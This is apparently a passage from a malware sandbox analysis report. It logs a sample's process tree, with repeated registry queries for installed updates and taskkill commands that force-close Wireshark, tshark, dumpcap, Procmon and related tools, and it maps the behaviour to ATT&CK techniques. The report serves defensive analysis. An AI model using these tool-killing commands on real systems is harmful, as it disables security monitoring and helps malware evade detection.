- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:2248
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:1120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:2160
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:2788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:2808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:2836
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:2876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:2868
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:2924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:2916
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:2956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2984
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:3004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    PID:3060
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:3024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    PID:2992
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:2052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:2136
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:1648
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:1900
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2172
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:2184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2176
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1564
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2324
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2400

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1568-112-0x0000000002890000-0x0000000002891000-memory.dmp

Filesize
4KB

Download
memory/1568-57-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/1568-108-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/1568-67-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/1568-135-0x0000000002780000-0x0000000002781000-memory.dmp

Filesize
4KB

Download
memory/1568-60-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/1568-138-0x0000000002790000-0x0000000002791000-memory.dmp

Filesize
4KB

Download
memory/1568-44-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp

Filesize
9.9MB

Download
memory/1568-56-0x0000000002380000-0x0000000002381000-memory.dmp

Filesize
4KB

Download